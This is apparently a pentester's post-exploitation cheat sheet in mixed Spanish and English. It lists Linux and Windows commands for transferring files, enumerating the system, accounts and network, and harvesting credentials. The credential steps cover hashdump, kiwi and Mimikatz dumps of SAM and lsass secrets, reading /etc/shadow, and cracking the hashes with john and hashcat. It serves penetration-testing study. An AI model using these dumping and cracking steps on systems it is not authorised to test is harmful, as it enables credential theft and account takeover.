Transferir files to and from the objective:
ftp (put & get, ? for help)
scp (ssh copy) TUTORIAL SCP
python3 -m http.server port (host a server)
python -m SimpleHTTPServer port (host a server)
wget (for downloading files TUTO WGET)
certuril & powershell (for downloading files Powershell + certutil)
Enumerate info from the target OS (Post Exploitation):
uname -a (kernel, OS, hostname, processorr)
cat /etc/issue (distribution + version)
cat /etc/*release (distribution + version, codename in parenthesis)
env (to see ENV variables)
lscpu (CPU info.)
free -h (RAM consumption)
df -h (list hard drives & mounted units)
df -ht ext4 (only lists units that are in format ext4)
lsblk | grep sd (list hard disks & filter by “sd” annotation)
dpkg -l (lists packages installed in debian & their version)
getuid (to see the user you are, like whoami)
sysinfo (hostname, O.S. & Service Pack, arch, system language & domain or hostname, distribution + release version, kernel & arch)
C:\Windows\system32\eula.txt (info OS, nº build, service pack)
show_mount (show all active units)
Windows cmd:
hostname (PC name)
systeminfo (hostname, OS name, OS version, OS manufacturer, OS config, processor, Win directory, system directory, boot device, keyboard & system language, total physical memory (RAM), domain, logon server y hotfixes, network card, hyper-v)
wmic qfe get Caption,Description,HotFixID,InstalledOn (additional info about hotfixes. The security updates are important for PrivEsc)
Compile information from files on the target:
cat, bat, batcat, less, more, type. (KNOW WHAT YOU'RE LOOKING FOR)
Recolectar información de cuentas en el objetivo:
getuid (actual user or user ID & group ID)
getprivs (display the privileges of the actual user)
search logged_on (all the info. about users logged in now & recently y SID)
whoami (actual user)
groups (to see the groups of the system)
groups xuser (to see the groups of xuser)
cat /etc/passwd (to see the system accounts, users account have a shell at the end “/bin/sh ó /bin/bash”)
last (last users connected to the system rightfully)
lastlog (users that connected the system [SSH or rightfully])
Windows cmd:
whoami (actual user)
whoami /priv (actual user privileges)
query user (logged in users)
net users (all the user accounts)
net user x (info about x user)
net localgroup (lists all the groups on the system)
net localgroup xgrupo (to see the users from x group)
Recolectar información de hash/password desde el objetivo:
hashdump (Windows: pgrep lsass -> migrate PID lsass -> hashdump)
kiwi -> help or ? -> creds_all (dump all the credentials hashes) -> lsa_dump_sam (dump all the NTLM hashes of the users) -> lsa_dump_secrets (sometimes dump credentials in plain text) -> password_change (to change the pass or the hash of a user)
cat /etc/shadow (NEED PRIVS.)
$1 -> MD5
$2 -> Blowfish
$5 -> SHA-256
$6 -> SHA-512
Metasploit: search hashdump (post/linux/gather/hashdump)
Crack SHA512-> john –format=sha512crypt archivo.txt –wordlist=/route/of/the/wordlist.txt
List hash formats in john: john -list=formats
hashcat -m 1800 -a 0 or 3 hash.txt /route/to/the/wordlist.txt
List hash formats and type of attacks in hashcat: hashcat -h
Hashcat: a 0 = dictionary attack; a 3 = bruteforce attack;
Windows cmd:
Mimikatz -> help or ? -> privilege::debug (if says 20 OK) -> lsadump::sam (we get the syskey;SAMkey;RID[500=admin]) -> lsadump::secrets -> sekurlsa::logonpassword (to get passwords in plain text if they're used &/or available)
Crack NTLM -> john –format=NT hash.txt –wordlist=/route/to/wordlist.txt
hashcat -m 1000 -a 0 ó 3 hashNTLM.txt /route/to/wordlist.txt
In the dump: 1º LM & 2º NTLM (LM is not used anymore, separated by ":")
Enumerar información de la red desde archivos en el objetivo:
ifconfig (IP address + interfaces + MAC + IPv4 + Netmask)
netstat (list active TCP/UDP services & their ports + other PCs in the network)
route (routing table, gateway is important)
arp (hosts connected to the network)
ifconfig (network card, MAC + IP + segment/netmask)
ip a s (MAC, IP + segment)
cat /etc/networks (interfaces & their config.)
cat /etc/hosts (hosts + local domains)
cat /etc/resolv.conf (DNS server by default)
arp -a (hosts connected to the network)
Windows cmd:
ipconfig (network adapters, DNS suffix, IPv4 & 6 addresses, netmask y gateway)
ipconfig /all (hostname, IP routing enabled, MAC Address, DHCP enabled [dynamic IPs], Lease expires, DHCPserver-gateway, DNS Server)
route print (routing table)
arp -a (all the hosts on the network, displays IP address & MAC)
netstat -ano (Protocols & ports of the services [the are from the host])
netsh firewall show state (firewall state)
netsh advfirewall firewall dump (dumpe config file of the firewall)
netsh advfirewall show allprofiles check if the firewall is active or not)